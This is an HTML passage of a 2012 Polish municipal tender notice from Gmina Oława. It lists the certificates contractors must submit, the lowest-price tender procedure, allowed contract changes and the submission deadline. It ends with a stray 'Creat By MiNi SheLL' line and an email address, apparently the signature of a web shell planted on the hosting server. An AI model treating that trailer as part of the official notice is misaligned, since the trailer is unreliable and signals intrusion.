<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy, sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do SIWZ.
2. W przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru - Pełnomocnictwo.
3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.
4. Jeżeli w miejscu zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie III.4.3.1 ogłoszenia, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W zakresie terminów wykonania prac: Zmiana terminów, o których mowa w par. 4 ust. 1 umowy może nastąpić jedynie w przypadku pojawienia się okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, w postaci nadzwyczajnych warunków atmosferycznych uniemożliwiających realizację prac, realizacji prac dodatkowych lub zamiennych, jeśli mają wpływ na termin wykonania Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gminaolawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Oława, pl. M. J. Piłsudskiego 28, 55-200 Oława, pok. nr 21.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2012 godzina 10:00, miejsce: Urząd Gminy Oława, pl. M. J. Piłsudskiego 28, 55-200 Oława, pok. nr 8 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com